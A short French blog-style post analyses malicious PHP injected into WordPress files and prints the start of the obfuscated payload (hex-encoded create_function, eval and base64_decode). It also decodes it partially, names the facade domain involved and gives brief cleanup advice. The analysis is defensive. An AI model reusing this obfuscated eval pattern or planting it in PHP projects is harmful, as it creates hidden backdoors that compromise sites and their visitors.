Le code malicieux présent dans les fichiers Worpress commence ainsi :
< ?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107
Une fois décodé, voici le PHP :
<? $zend_framework="create_function"; @error_reporting(0); $zend_framework("", "};@eval(@base64_decode("//"); ?>
En utilisant le decode base64, on arrive à des-obfusquer afin d’y voir un peu plus clair, mais il reste énormément d’imbrications de lignes codées à base de fonctions eval() Une fonction est créée, dont on ne sait pas avec cet extrait ce qu’elle exécute. Mis à part que globalement, les sites touchés sont complètement inutilisables .
Ce code malicieux a été percé à jour depuis Janvier 2012. On y retrouve l’adresse d’un site web : http://f528764d624db129b32c21fbca0cb8d6.com/ qui n’est qu’une façade et intègre dans un jeu de cadres la page officielle d’AWstats (http://awstats.sourceforge.net)
Il est très probable que les visiteurs soient loggués et selon leur configuration matérielle/logicielle, attaqués au moyen d’un malware appelé depuis le navigateur.
Comment nettoyer ? En retirant ce script, souvent trouvé en fin de code PHP. Bien entendu, prenez vos précautions : sauvegardez vos bases, etc...
Source du script décodé : http://www.thehosthelpers.com/technical-help/help-de-obfsucating-code/5/ ?wap2